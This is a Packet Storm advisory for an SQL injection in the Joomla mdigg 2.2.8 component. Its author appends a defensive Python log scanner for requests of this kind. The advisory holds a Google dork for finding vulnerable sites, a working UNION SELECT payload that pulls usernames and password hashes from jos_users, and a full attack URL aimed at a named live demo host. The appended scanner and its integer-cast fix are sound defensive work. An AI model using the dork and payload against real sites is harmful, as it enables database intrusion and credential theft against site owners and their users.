Joomla mdigg Component 2.2.8 SQL Injection

2008-12-31T00:00:00
ID PACKETSTORM:73409
Type packetstorm
Reporter boom3rang
Modified 2008-12-31T00:00:00

Description

`#############################################################  
Joomla Component com_mdigg(category) SQL-injection vulnerability  
#############################################################  
  
  
###################################################  
#[~] Author : boom3rang   
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.  
#[~] Vulnerability : SQL injection   
#[~] Google Dork : inurl:com_mdigg   
--------------------------------------------------  
#[!] Name : mdigg  
#[!] CreationDate : 10-12-2007  
#[!] Author : Zhigang Lei  
#[!] AuthorEmail : zhigang.lei@gmail.com   
#[!] Version : 2.2.8   
###################################################  
  
Example:  
http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]  
  
  
Exploit:  
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*  
  
  
LiveDEMO:  
http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*  
  
##############################  
#[!] Proud 2 be Albanian  
#[!] Proud 2 be Muslim  
#[!] United States of Albania  
##############################  
  
  
`
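
Added example (not part of the original advisory and not the component's code): a log check for defenders that flags requests to com_mdigg whose category parameter is not a plain integer, the condition the request above relies on. It assumes category is meant to be a numeric id and that the web server writes combined-format access logs; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [31/Dec/2008:10:00:01 +0000] "GET /index.php?option=com_mdigg&act=story_lists&task=view&category=3 HTTP/1.1" 200 5120
192.0.2.44 - - [31/Dec/2008:10:00:07 +0000] "GET /index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3/**/from/**/jos_users/* HTTP/1.1" 200 812
192.0.2.44 - - [31/Dec/2008:10:00:09 +0000] "GET /index.php?option=com_mdigg&act=story_lists&task=view&category=-9999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 640
192.0.2.10 - - [31/Dec/2008:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 9000
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category value is a plain decimal id.
INT_RE = re.compile(r'[0-9]+')
# Tokens seen in the advisory's request: UNION/SELECT/FROM and inline comments.
SQL_RE = re.compile(r'union|select|\bfrom\b|/\*|--', re.IGNORECASE)


def scan(log_text):
    """Return (line_no, client, severity, value) for suspicious com_mdigg hits."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qs percent-decodes, so encoded payloads are compared in clear.
        params = parse_qs(urlsplit(target).query)
        if "com_mdigg" not in params.get("option", []):
            continue
        for value in params.get("category", []):
            if INT_RE.fullmatch(value):
                continue  # expected numeric id
            severity = "sqli-pattern" if SQL_RE.search(value) else "non-integer"
            findings.append((line_no, client, severity, value))
    return findings


if __name__ == "__main__":
    for line_no, client, severity, value in scan(SAMPLE_LOG):
        print(f"line {line_no}: {client} {severity}: {value[:60]}")
```

The same integer test is the fix on the server side: a component that casts category to an integer before building its query leaves nothing for the injected text to reach.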